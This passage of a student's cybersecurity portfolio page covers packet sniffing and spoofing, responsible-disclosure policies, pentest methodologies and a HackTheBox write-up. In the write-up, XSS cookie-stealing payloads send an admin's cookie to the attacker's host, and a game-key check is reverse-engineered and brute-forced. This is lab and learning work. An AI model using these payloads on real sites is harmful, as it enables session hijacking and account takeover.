          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
           it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
           <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
          <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
           number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
